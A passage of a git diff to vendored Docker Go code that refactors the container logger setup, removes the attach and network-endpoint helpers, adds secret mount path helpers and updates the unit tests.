+func (container *Container) StartLogger() (logger.Logger, error) {
+	cfg := container.HostConfig.LogConfig
+	initDriver, err := logger.GetLogDriver(cfg.Type)
 	if err != nil {
-		return nil, fmt.Errorf("Failed to get logging factory: %v", err)
+		return nil, errors.Wrap(err, "failed to get logging factory")
 	}
-	ctx := logger.Context{
+	info := logger.Info{
 		Config:              cfg.Config,
 		ContainerID:         container.ID,
 		ContainerName:       container.Name,
@@ -337,12 +376,30 @@ func (container *Container) StartLogger(cfg containertypes.LogConfig) (logger.Lo
 
 	// Set logging file for "json-logger"
 	if cfg.Type == jsonfilelog.Name {
-		ctx.LogPath, err = container.GetRootResourcePath(fmt.Sprintf("%s-json.log", container.ID))
+		info.LogPath, err = container.GetRootResourcePath(fmt.Sprintf("%s-json.log", container.ID))
 		if err != nil {
 			return nil, err
 		}
+
+		container.LogPath = info.LogPath
 	}
-	return c(ctx)
+
+	l, err := initDriver(info)
+	if err != nil {
+		return nil, err
+	}
+
+	if containertypes.LogMode(cfg.Config["mode"]) == containertypes.LogModeNonBlock {
+		bufferSize := int64(-1)
+		if s, exists := cfg.Config["max-buffer-size"]; exists {
+			bufferSize, err = units.RAMInBytes(s)
+			if err != nil {
+				return nil, err
+			}
+		}
+		l = logger.NewRingLogger(l, info, bufferSize)
+	}
+	return l, nil
 }
 
 // GetProcessLabel returns the process label for the container.
@@ -366,185 +423,6 @@ func (container *Container) GetExecIDs() []string {
 	return container.ExecCommands.List()
 }
 
-// Attach connects to the container's TTY, delegating to standard
-// streams or websockets depending on the configuration.
-func (container *Container) Attach(stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error {
-	ctx := container.InitAttachContext()
-	return AttachStreams(ctx, container.StreamConfig, container.Config.OpenStdin, container.Config.StdinOnce, container.Config.Tty, stdin, stdout, stderr, keys)
-}
-
-// AttachStreams connects streams to a TTY.
-// Used by exec too. Should this move somewhere else?
-func AttachStreams(ctx context.Context, streamConfig *stream.Config, openStdin, stdinOnce, tty bool, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error {
-	var (
-		cStdout, cStderr io.ReadCloser
-		cStdin           io.WriteCloser
-		wg               sync.WaitGroup
-		errors           = make(chan error, 3)
-	)
-
-	if stdin != nil && openStdin {
-		cStdin = streamConfig.StdinPipe()
-		wg.Add(1)
-	}
-
-	if stdout != nil {
-		cStdout = streamConfig.StdoutPipe()
-		wg.Add(1)
-	}
-
-	if stderr != nil {
-		cStderr = streamConfig.StderrPipe()
-		wg.Add(1)
-	}
-
-	// Connect stdin of container to the http conn.
-	go func() {
-		if stdin == nil || !openStdin {
-			return
-		}
-		logrus.Debug("attach: stdin: begin")
-
-		var err error
-		if tty {
-			_, err = copyEscapable(cStdin, stdin, keys)
-		} else {
-			_, err = io.Copy(cStdin, stdin)
-		}
-		if err == io.ErrClosedPipe {
-			err = nil
-		}
-		if err != nil {
-			logrus.Errorf("attach: stdin: %s", err)
-			errors <- err
-		}
-		if stdinOnce && !tty {
-			cStdin.Close()
-		} else {
-			// No matter what, when stdin is closed (io.Copy unblock), close stdout and stderr
-			if cStdout != nil {
-				cStdout.Close()
-			}
-			if cStderr != nil {
-				cStderr.Close()
-			}
-		}
-		logrus.Debug("attach: stdin: end")
-		wg.Done()
-	}()
-
-	attachStream := func(name string, stream io.Writer, streamPipe io.ReadCloser) {
-		if stream == nil {
-			return
-		}
-
-		logrus.Debugf("attach: %s: begin", name)
-		_, err := io.Copy(stream, streamPipe)
-		if err == io.ErrClosedPipe {
-			err = nil
-		}
-		if err != nil {
-			logrus.Errorf("attach: %s: %v", name, err)
-			errors <- err
-		}
-		// Make sure stdin gets closed
-		if stdin != nil {
-			stdin.Close()
-		}
-		streamPipe.Close()
-		logrus.Debugf("attach: %s: end", name)
-		wg.Done()
-	}
-
-	go attachStream("stdout", stdout, cStdout)
-	go attachStream("stderr", stderr, cStderr)
-
-	return promise.Go(func() error {
-		done := make(chan struct{})
-		go func() {
-			wg.Wait()
-			close(done)
-		}()
-		select {
-		case <-done:
-		case <-ctx.Done():
-			// close all pipes
-			if cStdin != nil {
-				cStdin.Close()
-			}
-			if cStdout != nil {
-				cStdout.Close()
-			}
-			if cStderr != nil {
-				cStderr.Close()
-			}
-			<-done
-		}
-		close(errors)
-		for err := range errors {
-			if err != nil {
-				return err
-			}
-		}
-		return nil
-	})
-}
-
-// Code c/c from io.Copy() modified to handle escape sequence
-func copyEscapable(dst io.Writer, src io.ReadCloser, keys []byte) (written int64, err error) {
-	if len(keys) == 0 {
-		// Default keys : ctrl-p ctrl-q
-		keys = []byte{16, 17}
-	}
-	buf := make([]byte, 32*1024)
-	for {
-		nr, er := src.Read(buf)
-		if nr > 0 {
-			// ---- Docker addition
-			preservBuf := []byte{}
-			for i, key := range keys {
-				preservBuf = append(preservBuf, buf[0:nr]...)
-				if nr != 1 || buf[0] != key {
-					break
-				}
-				if i == len(keys)-1 {
-					src.Close()
-					return 0, DetachError{}
-				}
-				nr, er = src.Read(buf)
-			}
-			var nw int
-			var ew error
-			if len(preservBuf) > 0 {
-				nw, ew = dst.Write(preservBuf)
-				nr = len(preservBuf)
-			} else {
-				// ---- End of docker
-				nw, ew = dst.Write(buf[0:nr])
-			}
-			if nw > 0 {
-				written += int64(nw)
-			}
-			if ew != nil {
-				err = ew
-				break
-			}
-			if nr != nw {
-				err = io.ErrShortWrite
-				break
-			}
-		}
-		if er == io.EOF {
-			break
-		}
-		if er != nil {
-			err = er
-			break
-		}
-	}
-	return written, err
-}
-
 // ShouldRestart decides whether the daemon should restart the container or not.
 // This is based on the container's restart policy.
 func (container *Container) ShouldRestart() bool {
@@ -554,14 +432,19 @@ func (container *Container) ShouldRestart() bool {
 
 // AddMountPointWithVolume adds a new mount point configured with a volume to the container.
 func (container *Container) AddMountPointWithVolume(destination string, vol volume.Volume, rw bool) {
-	container.MountPoints[destination] = &volume.MountPoint{
+	operatingSystem := container.OS
+	if operatingSystem == "" {
+		operatingSystem = runtime.GOOS
+	}
+	volumeParser := volumemounts.NewParser(operatingSystem)
+	container.MountPoints[destination] = &volumemounts.MountPoint{
 		Type:        mounttypes.TypeVolume,
 		Name:        vol.Name(),
 		Driver:      vol.DriverName(),
 		Destination: destination,
 		RW:          rw,
 		Volume:      vol,
-		CopyData:    volume.DefaultCopyMode,
+		CopyData:    volumeParser.DefaultCopyMode(),
 	}
 }
 
@@ -569,21 +452,20 @@ func (container *Container) AddMountPointWithVolume(destination string, vol volu
 func (container *Container) UnmountVolumes(volumeEventLog func(name, action string, attributes map[string]string)) error {
 	var errors []string
 	for _, volumeMount := range container.MountPoints {
-		// Check if the mounpoint has an ID, this is currently the best way to tell if it's actually mounted
-		// TODO(cpuguyh83): there should be a better way to handle this
-		if volumeMount.Volume != nil && volumeMount.ID != "" {
-			if err := volumeMount.Volume.Unmount(volumeMount.ID); err != nil {
-				errors = append(errors, err.Error())
-				continue
-			}
-			volumeMount.ID = ""
+		if volumeMount.Volume == nil {
+			continue
+		}
 
-			attributes := map[string]string{
-				"driver":    volumeMount.Volume.DriverName(),
-				"container": container.ID,
-			}
-			volumeEventLog(volumeMount.Volume.Name(), "unmount", attributes)
+		if err := volumeMount.Cleanup(); err != nil {
+			errors = append(errors, err.Error())
+			continue
 		}
+
+		attributes := map[string]string{
+			"driver":    volumeMount.Volume.DriverName(),
+			"container": container.ID,
+		}
+		volumeEventLog(volumeMount.Volume.Name(), "unmount", attributes)
 	}
 	if len(errors) > 0 {
 		return fmt.Errorf("error while unmounting volumes for container %s: %s", container.ID, strings.Join(errors, "; "))
@@ -641,337 +523,6 @@ func (container *Container) InitDNSHostConfig() {
 	}
 }
 
-// GetEndpointInNetwork returns the container's endpoint to the provided network.
-func (container *Container) GetEndpointInNetwork(n libnetwork.Network) (libnetwork.Endpoint, error) {
-	endpointName := strings.TrimPrefix(container.Name, "/")
-	return n.EndpointByName(endpointName)
-}
-
-func (container *Container) buildPortMapInfo(ep libnetwork.Endpoint) error {
-	if ep == nil {
-		return errInvalidEndpoint
-	}
-
-	networkSettings := container.NetworkSettings
-	if networkSettings == nil {
-		return errInvalidNetwork
-	}
-
-	if len(networkSettings.Ports) == 0 {
-		pm, err := getEndpointPortMapInfo(ep)
-		if err != nil {
-			return err
-		}
-		networkSettings.Ports = pm
-	}
-	return nil
-}
-
-func getEndpointPortMapInfo(ep libnetwork.Endpoint) (nat.PortMap, error) {
-	pm := nat.PortMap{}
-	driverInfo, err := ep.DriverInfo()
-	if err != nil {
-		return pm, err
-	}
-
-	if driverInfo == nil {
-		// It is not an error for epInfo to be nil
-		return pm, nil
-	}
-
-	if expData, ok := driverInfo[netlabel.ExposedPorts]; ok {
-		if exposedPorts, ok := expData.([]types.TransportPort); ok {
-			for _, tp := range exposedPorts {
-				natPort, err := nat.NewPort(tp.Proto.String(), strconv.Itoa(int(tp.Port)))
-				if err != nil {
-					return pm, fmt.Errorf("Error parsing Port value(%v):%v", tp.Port, err)
-				}
-				pm[natPort] = nil
-			}
-		}
-	}
-
-	mapData, ok := driverInfo[netlabel.PortMap]
-	if !ok {
-		return pm, nil
-	}
-
-	if portMapping, ok := mapData.([]types.PortBinding); ok {
-		for _, pp := range portMapping {
-			natPort, err := nat.NewPort(pp.Proto.String(), strconv.Itoa(int(pp.Port)))
-			if err != nil {
-				return pm, err
-			}
-			natBndg := nat.PortBinding{HostIP: pp.HostIP.String(), HostPort: strconv.Itoa(int(pp.HostPort))}
-			pm[natPort] = append(pm[natPort], natBndg)
-		}
-	}
-
-	return pm, nil
-}
-
-// GetSandboxPortMapInfo retrieves the current port-mapping programmed for the given sandbox
-func GetSandboxPortMapInfo(sb libnetwork.Sandbox) nat.PortMap {
-	pm := nat.PortMap{}
-	if sb == nil {
-		return pm
-	}
-
-	for _, ep := range sb.Endpoints() {
-		pm, _ = getEndpointPortMapInfo(ep)
-		if len(pm) > 0 {
-			break
-		}
-	}
-	return pm
-}
-
-// BuildEndpointInfo sets endpoint-related fields on container.NetworkSettings based on the provided network and endpoint.
-func (container *Container) BuildEndpointInfo(n libnetwork.Network, ep libnetwork.Endpoint) error {
-	if ep == nil {
-		return errInvalidEndpoint
-	}
-
-	networkSettings := container.NetworkSettings
-	if networkSettings == nil {
-		return errInvalidNetwork
-	}
-
-	epInfo := ep.Info()
-	if epInfo == nil {
-		// It is not an error to get an empty endpoint info
-		return nil
-	}
-
-	if _, ok := networkSettings.Networks[n.Name()]; !ok {
-		networkSettings.Networks[n.Name()] = &network.EndpointSettings{
-			EndpointSettings: &networktypes.EndpointSettings{},
-		}
-	}
-	networkSettings.Networks[n.Name()].NetworkID = n.ID()
-	networkSettings.Networks[n.Name()].EndpointID = ep.ID()
-
-	iface := epInfo.Iface()
-	if iface == nil {
-		return nil
-	}
-
-	if iface.MacAddress() != nil {
-		networkSettings.Networks[n.Name()].MacAddress = iface.MacAddress().String()
-	}
-
-	if iface.Address() != nil {
-		ones, _ := iface.Address().Mask.Size()
-		networkSettings.Networks[n.Name()].IPAddress = iface.Address().IP.String()
-		networkSettings.Networks[n.Name()].IPPrefixLen = ones
-	}
-
-	if iface.AddressIPv6() != nil && iface.AddressIPv6().IP.To16() != nil {
-		onesv6, _ := iface.AddressIPv6().Mask.Size()
-		networkSettings.Networks[n.Name()].GlobalIPv6Address = iface.AddressIPv6().IP.String()
-		networkSettings.Networks[n.Name()].GlobalIPv6PrefixLen = onesv6
-	}
-
-	return nil
-}
-
-// UpdateJoinInfo updates network settings when container joins network n with endpoint ep.
-func (container *Container) UpdateJoinInfo(n libnetwork.Network, ep libnetwork.Endpoint) error {
-	if err := container.buildPortMapInfo(ep); err != nil {
-		return err
-	}
-
-	epInfo := ep.Info()
-	if epInfo == nil {
-		// It is not an error to get an empty endpoint info
-		return nil
-	}
-	if epInfo.Gateway() != nil {
-		container.NetworkSettings.Networks[n.Name()].Gateway = epInfo.Gateway().String()
-	}
-	if epInfo.GatewayIPv6().To16() != nil {
-		container.NetworkSettings.Networks[n.Name()].IPv6Gateway = epInfo.GatewayIPv6().String()
-	}
-
-	return nil
-}
-
-// UpdateSandboxNetworkSettings updates the sandbox ID and Key.
-func (container *Container) UpdateSandboxNetworkSettings(sb libnetwork.Sandbox) error {
-	container.NetworkSettings.SandboxID = sb.ID()
-	container.NetworkSettings.SandboxKey = sb.Key()
-	return nil
-}
-
-// BuildJoinOptions builds endpoint Join options from a given network.
-func (container *Container) BuildJoinOptions(n libnetwork.Network) ([]libnetwork.EndpointOption, error) {
-	var joinOptions []libnetwork.EndpointOption
-	if epConfig, ok := container.NetworkSettings.Networks[n.Name()]; ok {
-		for _, str := range epConfig.Links {
-			name, alias, err := runconfigopts.ParseLink(str)
-			if err != nil {
-				return nil, err
-			}
-			joinOptions = append(joinOptions, libnetwork.CreateOptionAlias(name, alias))
-		}
-	}
-	return joinOptions, nil
-}
-
-// BuildCreateEndpointOptions builds endpoint options from a given network.
-func (container *Container) BuildCreateEndpointOptions(n libnetwork.Network, epConfig *networktypes.EndpointSettings, sb libnetwork.Sandbox, daemonDNS []string) ([]libnetwork.EndpointOption, error) {
-	var (
-		bindings      = make(nat.PortMap)
-		pbList        []types.PortBinding
-		exposeList    []types.TransportPort
-		createOptions []libnetwork.EndpointOption
-	)
-
-	defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName()
-
-	if (!container.EnableServiceDiscoveryOnDefaultNetwork() && n.Name() == defaultNetName) ||
-		container.NetworkSettings.IsAnonymousEndpoint {
-		createOptions = append(createOptions, libnetwork.CreateOptionAnonymous())
-	}
-
-	if epConfig != nil {
-		ipam := epConfig.IPAMConfig
-		if ipam != nil && (ipam.IPv4Address != "" || ipam.IPv6Address != "" || len(ipam.LinkLocalIPs) > 0) {
-			var ipList []net.IP
-			for _, ips := range ipam.LinkLocalIPs {
-				if ip := net.ParseIP(ips); ip != nil {
-					ipList = append(ipList, ip)
-				}
-			}
-			createOptions = append(createOptions,
-				libnetwork.CreateOptionIpam(net.ParseIP(ipam.IPv4Address), net.ParseIP(ipam.IPv6Address), ipList, nil))
-		}
-
-		for _, alias := range epConfig.Aliases {
-			createOptions = append(createOptions, libnetwork.CreateOptionMyAlias(alias))
-		}
-	}
-
-	if container.NetworkSettings.Service != nil {
-		svcCfg := container.NetworkSettings.Service
-
-		var vip string
-		if svcCfg.VirtualAddresses[n.ID()] != nil {
-			vip = svcCfg.VirtualAddresses[n.ID()].IPv4
-		}
-
-		var portConfigs []*libnetwork.PortConfig
-		for _, portConfig := range svcCfg.ExposedPorts {
-			portConfigs = append(portConfigs, &libnetwork.PortConfig{
-				Name:          portConfig.Name,
-				Protocol:      libnetwork.PortConfig_Protocol(portConfig.Protocol),
-				TargetPort:    portConfig.TargetPort,
-				PublishedPort: portConfig.PublishedPort,
-			})
-		}
-
-		createOptions = append(createOptions, libnetwork.CreateOptionService(svcCfg.Name, svcCfg.ID, net.ParseIP(vip), portConfigs, svcCfg.Aliases[n.ID()]))
-	}
-
-	if !containertypes.NetworkMode(n.Name()).IsUserDefined() {
-		createOptions = append(createOptions, libnetwork.CreateOptionDisableResolution())
-	}
-
-	// configs that are applicable only for the endpoint in the network
-	// to which container was connected to on docker run.
-	// Ideally all these network-specific endpoint configurations must be moved under
-	// container.NetworkSettings.Networks[n.Name()]
-	if n.Name() == container.HostConfig.NetworkMode.NetworkName() ||
-		(n.Name() == defaultNetName && container.HostConfig.NetworkMode.IsDefault()) {
-		if container.Config.MacAddress != "" {
-			mac, err := net.ParseMAC(container.Config.MacAddress)
-			if err != nil {
-				return nil, err
-			}
-
-			genericOption := options.Generic{
-				netlabel.MacAddress: mac,
-			}
-
-			createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(genericOption))
-		}
-	}
-
-	// Port-mapping rules belong to the container & applicable only to non-internal networks
-	portmaps := GetSandboxPortMapInfo(sb)
-	if n.Info().Internal() || len(portmaps) > 0 {
-		return createOptions, nil
-	}
-
-	if container.HostConfig.PortBindings != nil {
-		for p, b := range container.HostConfig.PortBindings {
-			bindings[p] = []nat.PortBinding{}
-			for _, bb := range b {
-				bindings[p] = append(bindings[p], nat.PortBinding{
-					HostIP:   bb.HostIP,
-					HostPort: bb.HostPort,
-				})
-			}
-		}
-	}
-
-	portSpecs := container.Config.ExposedPorts
-	ports := make([]nat.Port, len(portSpecs))
-	var i int
-	for p := range portSpecs {
-		ports[i] = p
-		i++
-	}
-	nat.SortPortMap(ports, bindings)
-	for _, port := range ports {
-		expose := types.TransportPort{}
-		expose.Proto = types.ParseProtocol(port.Proto())
-		expose.Port = uint16(port.Int())
-		exposeList = append(exposeList, expose)
-
-		pb := types.PortBinding{Port: expose.Port, Proto: expose.Proto}
-		binding := bindings[port]
-		for i := 0; i < len(binding); i++ {
-			pbCopy := pb.GetCopy()
-			newP, err := nat.NewPort(nat.SplitProtoPort(binding[i].HostPort))
-			var portStart, portEnd int
-			if err == nil {
-				portStart, portEnd, err = newP.Range()
-			}
-			if err != nil {
-				return nil, fmt.Errorf("Error parsing HostPort value(%s):%v", binding[i].HostPort, err)
-			}
-			pbCopy.HostPort = uint16(portStart)
-			pbCopy.HostPortEnd = uint16(portEnd)
-			pbCopy.HostIP = net.ParseIP(binding[i].HostIP)
-			pbList = append(pbList, pbCopy)
-		}
-
-		if container.HostConfig.PublishAllPorts && len(binding) == 0 {
-			pbList = append(pbList, pb)
-		}
-	}
-
-	var dns []string
-
-	if len(container.HostConfig.DNS) > 0 {
-		dns = container.HostConfig.DNS
-	} else if len(daemonDNS) > 0 {
-		dns = daemonDNS
-	}
-
-	if len(dns) > 0 {
-		createOptions = append(createOptions,
-			libnetwork.CreateOptionDNS(dns))
-	}
-
-	createOptions = append(createOptions,
-		libnetwork.CreateOptionPortMapping(pbList),
-		libnetwork.CreateOptionExposedPorts(exposeList))
-
-	return createOptions, nil
-}
-
 // UpdateMonitor updates monitor configure for running container
 func (container *Container) UpdateMonitor(restartPolicy containertypes.RestartPolicy) {
 	type policySetter interface {
@@ -1044,9 +595,9 @@ func (container *Container) startLogging() error {
 		return nil // do not start logging routines
 	}
 
-	l, err := container.StartLogger(container.HostConfig.LogConfig)
+	l, err := container.StartLogger()
 	if err != nil {
-		return fmt.Errorf("Failed to initialize logging driver: %v", err)
+		return fmt.Errorf("failed to initialize logging driver: %v", err)
 	}
 
 	copier := logger.NewCopier(map[string]io.Reader{"stdout": container.StdoutPipe(), "stderr": container.StderrPipe()}, l)
@@ -1054,11 +605,6 @@ func (container *Container) startLogging() error {
 	copier.Run()
 	container.LogDriver = l
 
-	// set LogPath field only for json-file logdriver
-	if jl, ok := l.(*jsonfilelog.JSONFileLogger); ok {
-		container.LogPath = jl.LogPath()
-	}
-
 	return nil
 }
 
@@ -1083,10 +629,10 @@ func (container *Container) CloseStreams() error {
 }
 
 // InitializeStdio is called by libcontainerd to connect the stdio.
-func (container *Container) InitializeStdio(iop libcontainerd.IOPipe) error {
+func (container *Container) InitializeStdio(iop *cio.DirectIO) (cio.IO, error) {
 	if err := container.startLogging(); err != nil {
 		container.Reset(false)
-		return err
+		return nil, err
 	}
 
 	container.StreamConfig.CopyToPipe(iop)
@@ -1099,5 +645,76 @@ func (container *Container) InitializeStdio(iop libcontainerd.IOPipe) error {
 		}
 	}
 
-	return nil
+	return &rio{IO: iop, sc: container.StreamConfig}, nil
+}
+
+// MountsResourcePath returns the path where mounts are stored for the given mount
+func (container *Container) MountsResourcePath(mount string) (string, error) {
+	return container.GetRootResourcePath(filepath.Join("mounts", mount))
+}
+
+// SecretMountPath returns the path of the secret mount for the container
+func (container *Container) SecretMountPath() (string, error) {
+	return container.MountsResourcePath("secrets")
+}
+
+// SecretFilePath returns the path to the location of a secret on the host.
+func (container *Container) SecretFilePath(secretRef swarmtypes.SecretReference) (string, error) {
+	secrets, err := container.SecretMountPath()
+	if err != nil {
+		return "", err
+	}
+	return filepath.Join(secrets, secretRef.SecretID), nil
+}
+
+func getSecretTargetPath(r *swarmtypes.SecretReference) string {
+	if filepath.IsAbs(r.File.Name) {
+		return r.File.Name
+	}
+
+	return filepath.Join(containerSecretMountPath, r.File.Name)
+}
+
+// CreateDaemonEnvironment creates a new environment variable slice for this container.
+func (container *Container) CreateDaemonEnvironment(tty bool, linkedEnv []string) []string {
+	// Setup environment
+	os := container.OS
+	if os == "" {
+		os = runtime.GOOS
+	}
+	env := []string{}
+	if runtime.GOOS != "windows" || (runtime.GOOS == "windows" && os == "linux") {
+		env = []string{
+			"PATH=" + system.DefaultPathEnv(os),
+			"HOSTNAME=" + container.Config.Hostname,
+		}
+		if tty {
+			env = append(env, "TERM=xterm")
+		}
+		env = append(env, linkedEnv...)
+	}
+
+	// because the env on the container can override certain default values
+	// we need to replace the 'env' keys where they match and append anything
+	// else.
+	env = ReplaceOrAppendEnvValues(env, container.Config.Env)
+	return env
+}
+
+type rio struct {
+	cio.IO
+
+	sc *stream.Config
+}
+
+func (i *rio) Close() error {
+	i.IO.Close()
+
+	return i.sc.CloseStreams()
+}
+
+func (i *rio) Wait() {
+	i.sc.Wait()
+
+	i.IO.Wait()
 }
diff --git a/vendor/github.com/docker/docker/container/container_linux.go b/vendor/github.com/docker/docker/container/container_linux.go
deleted file mode 100644
index 4d4c16b563..0000000000
--- a/vendor/github.com/docker/docker/container/container_linux.go
+++ /dev/null
@@ -1,9 +0,0 @@
-package container
-
-import (
-	"golang.org/x/sys/unix"
-)
-
-func detachMounted(path string) error {
-	return unix.Unmount(path, unix.MNT_DETACH)
-}
diff --git a/vendor/github.com/docker/docker/container/container_notlinux.go b/vendor/github.com/docker/docker/container/container_notlinux.go
deleted file mode 100644
index f65653e992..0000000000
--- a/vendor/github.com/docker/docker/container/container_notlinux.go
+++ /dev/null
@@ -1,23 +0,0 @@
-// +build solaris freebsd
-
-package container
-
-import (
-	"golang.org/x/sys/unix"
-)
-
-func detachMounted(path string) error {
-	//Solaris and FreeBSD do not support the lazy unmount or MNT_DETACH feature.
-	// Therefore there are separate definitions for this.
-	return unix.Unmount(path, 0)
-}
-
-// SecretMount returns the mount for the secret path
-func (container *Container) SecretMount() *Mount {
-	return nil
-}
-
-// UnmountSecrets unmounts the fs for secrets
-func (container *Container) UnmountSecrets() error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/container/container_unit_test.go b/vendor/github.com/docker/docker/container/container_unit_test.go
index f301f25bbe..82b5864760 100644
--- a/vendor/github.com/docker/docker/container/container_unit_test.go
+++ b/vendor/github.com/docker/docker/container/container_unit_test.go
@@ -1,17 +1,22 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
 	"testing"
 
 	"github.com/docker/docker/api/types/container"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/logger/jsonfilelog"
 	"github.com/docker/docker/pkg/signal"
+	"gotest.tools/assert"
 )
 
 func TestContainerStopSignal(t *testing.T) {
 	c := &Container{
-		CommonContainer: CommonContainer{
-			Config: &container.Config{},
-		},
+		Config: &container.Config{},
 	}
 
 	def, err := signal.ParseSignal(signal.DefaultStopSignal)
@@ -25,9 +30,7 @@ func TestContainerStopSignal(t *testing.T) {
 	}
 
 	c = &Container{
-		CommonContainer: CommonContainer{
-			Config: &container.Config{StopSignal: "SIGKILL"},
-		},
+		Config: &container.Config{StopSignal: "SIGKILL"},
 	}
 	s = c.StopSignal()
 	if s != 9 {
@@ -37,9 +40,7 @@ func TestContainerStopSignal(t *testing.T) {
 
 func TestContainerStopTimeout(t *testing.T) {
 	c := &Container{
-		CommonContainer: CommonContainer{
-			Config: &container.Config{},
-		},
+		Config: &container.Config{},
 	}
 
 	s := c.StopTimeout()
@@ -49,12 +50,77 @@ func TestContainerStopTimeout(t *testing.T) {
 
 	stopTimeout := 15
 	c = &Container{
-		CommonContainer: CommonContainer{
-			Config: &container.Config{StopTimeout: &stopTimeout},
+		Config: &container.Config{StopTimeout: &stopTimeout},
+	}
+	s = c.StopTimeout()
+	if s != stopTimeout {
+		t.Fatalf("Expected %v, got %v", stopTimeout, s)
+	}
+}
+
+func TestContainerSecretReferenceDestTarget(t *testing.T) {
+	ref := &swarmtypes.SecretReference{
+		File: &swarmtypes.SecretReferenceFileTarget{
+			Name: "app",
 		},
 	}
-	s = c.StopSignal()
-	if s != 15 {
-		t.Fatalf("Expected 15, got %v", s)
+
+	d := getSecretTargetPath(ref)
+	expected := filepath.Join(containerSecretMountPath, "app")
+	if d != expected {
+		t.Fatalf("expected secret dest %q; received %q", expected, d)
 	}
 }
+
+func TestContainerLogPathSetForJSONFileLogger(t *testing.T) {
+	containerRoot, err := ioutil.TempDir("", "TestContainerLogPathSetForJSONFileLogger")
+	assert.NilError(t, err)
+	defer os.RemoveAll(containerRoot)
+
+	c := &Container{
+		Config: &container.Config{},
+		HostConfig: &container.HostConfig{
+			LogConfig: container.LogConfig{
+				Type: jsonfilelog.Name,
+			},
+		},
+		ID:   "TestContainerLogPathSetForJSONFileLogger",
+		Root: containerRoot,
+	}
+
+	logger, err := c.StartLogger()
+	assert.NilError(t, err)
+	defer logger.Close()
+
+	expectedLogPath, err := filepath.Abs(filepath.Join(containerRoot, fmt.Sprintf("%s-json.log", c.ID)))
+	assert.NilError(t, err)
+	assert.Equal(t, c.LogPath, expectedLogPath)
+}
+
+func TestContainerLogPathSetForRingLogger(t *testing.T) {
+	containerRoot, err := ioutil.TempDir("", "TestContainerLogPathSetForRingLogger")
+	assert.NilError(t, err)
+	defer os.RemoveAll(containerRoot)
+
+	c := &Container{
+		Config: &container.Config{},
+		HostConfig: &container.HostConfig{
+			LogConfig: container.LogConfig{
+				Type: jsonfilelog.Name,
+				Config: map[string]string{
+					"mode": string(container.LogModeNonBlock),
+				},
+			},
+		},
+		ID:   "TestContainerLogPathSetForRingLogger",
+		Root: containerRoot,
+	}
+
+	logger, err := c.StartLogger()
+	assert.NilError(t, err)
+	defer logger.Close()
+
+	expectedLogPath, err := filepath.Abs(filepath.Join(containerRoot, fmt.Sprintf("%s-json.log", c.ID)))
+	assert.NilError(t, err)
+	assert.Equal(t, c.LogPath, expectedLogPath)
+}
diff --git a/vendor/github.com/docker/docker/container/container_unix.go b/vendor/github.com/docker/docker/container/container_unix.go
index 4f6b795d2c..ed664f3eec 100644
--- a/vendor/github.com/docker/docker/container/container_unix.go
+++ b/vendor/github.com/docker/docker/container/container_unix.go
@@ -1,77 +1,34 @@
-// +build linux freebsd solaris
+// +build !windows
 
-package container
+package container // import "github.com/docker/docker/container"
 
 import (
-	"fmt"
 	"io/ioutil"
 	"os"
 	"path/filepath"
-	"strings"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/containerd/continuity/fs"
+	"github.com/docker/docker/api/types"
 	containertypes "github.com/docker/docker/api/types/container"
 	mounttypes "github.com/docker/docker/api/types/mount"
-	"github.com/docker/docker/pkg/chrootarchive"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/pkg/symlink"
-	"github.com/docker/docker/pkg/system"
-	"github.com/docker/docker/utils"
 	"github.com/docker/docker/volume"
-	"github.com/opencontainers/runc/libcontainer/label"
+	volumemounts "github.com/docker/docker/volume/mounts"
+	"github.com/opencontainers/selinux/go-selinux/label"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 	"golang.org/x/sys/unix"
 )
 
 const (
-	// DefaultSHMSize is the default size (64MB) of the SHM which will be mounted in the container
-	DefaultSHMSize           int64 = 67108864
-	containerSecretMountPath       = "/run/secrets"
-)
-
-// Container holds the fields specific to unixen implementations.
-// See CommonContainer for standard fields common to all containers.
-type Container struct {
-	CommonContainer
-
-	// Fields below here are platform specific.
-	AppArmorProfile string
-	HostnamePath    string
-	HostsPath       string
-	ShmPath         string
-	ResolvConfPath  string
-	SeccompProfile  string
-	NoNewPrivileges bool
-}
-
-// ExitStatus provides exit reasons for a container.
-type ExitStatus struct {
-	// The exit code with which the container exited.
-	ExitCode int
-
-	// Whether the container encountered an OOM.
-	OOMKilled bool
-}
+	// DefaultStopTimeout sets the default time, in seconds, to wait
+	// for the graceful container stop before forcefully terminating it.
+	DefaultStopTimeout = 10
 
-// CreateDaemonEnvironment returns the list of all environment variables given the list of
-// environment variables related to links.
-// Sets PATH, HOSTNAME and if container.Config.Tty is set: TERM.
-// The defaults set here do not override the values in container.Config.Env
-func (container *Container) CreateDaemonEnvironment(tty bool, linkedEnv []string) []string {
-	// Setup environment
-	env := []string{
-		"PATH=" + system.DefaultPathEnv,
-		"HOSTNAME=" + container.Config.Hostname,
-	}
-	if tty {
-		env = append(env, "TERM=xterm")
-	}
-	env = append(env, linkedEnv...)
-	// because the env on the container can override certain default values
-	// we need to replace the 'env' keys where they match and append anything
-	// else.
-	env = utils.ReplaceOrAppendEnvValues(env, container.Config.Env)
-	return env
-}
+	containerSecretMountPath = "/run/secrets"
+)
 
 // TrySetNetworkMount attempts to set the network mounts given a provided destination and
 // the path to use for it; return true if the given destination was a network mount file
@@ -106,22 +63,22 @@ func (container *Container) BuildHostnameFile() error {
 func (container *Container) NetworkMounts() []Mount {
 	var mounts []Mount
 	shared := container.HostConfig.NetworkMode.IsContainer()
+	parser := volumemounts.NewParser(container.OS)
 	if container.ResolvConfPath != "" {
 		if _, err := os.Stat(container.ResolvConfPath); err != nil {
 			logrus.Warnf("ResolvConfPath set to %q, but can't stat this filename (err = %v); skipping", container.ResolvConfPath, err)
 		} else {
-			if !container.HasMountFor("/etc/resolv.conf") {
-				label.Relabel(container.ResolvConfPath, container.MountLabel, shared)
-			}
 			writable := !container.HostConfig.ReadonlyRootfs
